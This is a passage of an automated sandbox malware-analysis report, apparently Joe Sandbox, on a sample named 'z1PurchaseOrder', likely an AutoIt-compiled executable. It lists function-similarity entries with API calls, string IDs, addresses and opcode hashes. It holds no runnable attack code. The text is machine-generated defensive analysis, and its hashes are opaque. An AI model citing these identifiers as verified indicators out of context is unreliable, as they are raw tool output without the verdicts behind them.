                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: MessageSend_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 455545452-1403004172
                                        • Opcode ID: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                                        • Instruction ID: 72d13aeac174e9c1a3a177398698555a642000804846b33da1492f44d6438514
                                        • Opcode Fuzzy Hash: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                                        • Instruction Fuzzy Hash: 4D01A77374111067C610BA6A9C01AEB739CABD2364F44443BF94597292EA7DED0E43AA
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: _strncmp
                                        • String ID: ,$UTF8)
                                        • API String ID: 909875538-2632631837
                                        • Opcode ID: 22b8665b0e86fd7b9cc207e20be34a7df1e81b6ae5597b13afeebda2f69d61f7
                                        • Instruction ID: 35c0b5e4e6bd282640ba12729024cfd3588da47ca1ed1c49f01331a057b7ec9b
                                        • Opcode Fuzzy Hash: 22b8665b0e86fd7b9cc207e20be34a7df1e81b6ae5597b13afeebda2f69d61f7
                                        • Instruction Fuzzy Hash: 7601B575A083805BE720DE20CC85BA773A1AB81319F58492ED8D5872A1F73DD449C75B
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: _strncmp
                                        • String ID: ,$UTF8)
                                        • API String ID: 909875538-2632631837
                                        • Opcode ID: a99238705f7b77a71f9e68bc23a57c83073e0de590aab0f28e352476349a7ac1
                                        • Instruction ID: b3c6803870d1b21283bf32431af321d4190ac902c568a1d8b2e557ddf245ca97
                                        • Opcode Fuzzy Hash: a99238705f7b77a71f9e68bc23a57c83073e0de590aab0f28e352476349a7ac1
                                        • Instruction Fuzzy Hash: 1E01D875A043805BE720DE20CC85B6773A19B4131AF68492FD8D6872A1F73DD449C75B
                                        APIs
                                        • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560BA
                                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                        • wsprintfW.USER32 ref: 004560E9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: MessageSend_mallocwsprintf
                                        • String ID: %d/%02d/%02d
                                        • API String ID: 1262938277-328681919
                                        • Opcode ID: dc5fd9a877cd0fc352ed6de9b5f97ee6fb2dcbb154e3a48ad4a1e49fbb654ae8
                                        • Instruction ID: 2a73c44ac592e0fe880a68d863bd42ca8887a008949f121bccc13d44bcf2ebb3
                                        • Opcode Fuzzy Hash: dc5fd9a877cd0fc352ed6de9b5f97ee6fb2dcbb154e3a48ad4a1e49fbb654ae8
                                        • Instruction Fuzzy Hash: 13F08272744220A7E2105BA5AC01BBFB3D4EB84762F10443BFE44D12C0E66E8455D7BA
                                        APIs
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0044226C
                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0044227F
                                          • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: FindMessagePostSleepWindow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 529655941-2988720461
                                        • Opcode ID: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                        • Instruction ID: f0ed9326d30a696a9ade51716a531e8bd1705000bbe21894ac7a57cb5589152b
                                        • Opcode Fuzzy Hash: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                        • Instruction Fuzzy Hash: 71D0A772F8130177E92077706D0FFCB26246F14710F010C3AB305AA1C0D4E8D440C358
                                        APIs
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00442240
                                        • PostMessageW.USER32(00000000), ref: 00442247
                                          • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: FindMessagePostSleepWindow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 529655941-2988720461
                                        • Opcode ID: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                        • Instruction ID: d1e5b9be119239975405e397b0c0efdc35250005003305bf123d4268f2ecb06f
                                        • Opcode Fuzzy Hash: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                        • Instruction Fuzzy Hash: 4DD05E72B813013BE92076706D0FF8B26246B14710F010C2AB205AA1C0D4E8A4408358
                                        APIs
                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00439522
                                          • Part of subcall function 00411A1F: _doexit.LIBCMT ref: 00411A2B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Message_doexit
                                        • String ID: AutoIt$Error allocating memory.
                                        • API String ID: 1993061046-4017498283
                                        • Opcode ID: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                        • Instruction ID: 5d68346425d2699d55792fe39b85c2381918ba1f955abba655776c5540820644
                                        • Opcode Fuzzy Hash: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                        • Instruction Fuzzy Hash: 82B092343C038627E20437A01C0BF8C28049B64F42F220C2AB308384D259D90080231E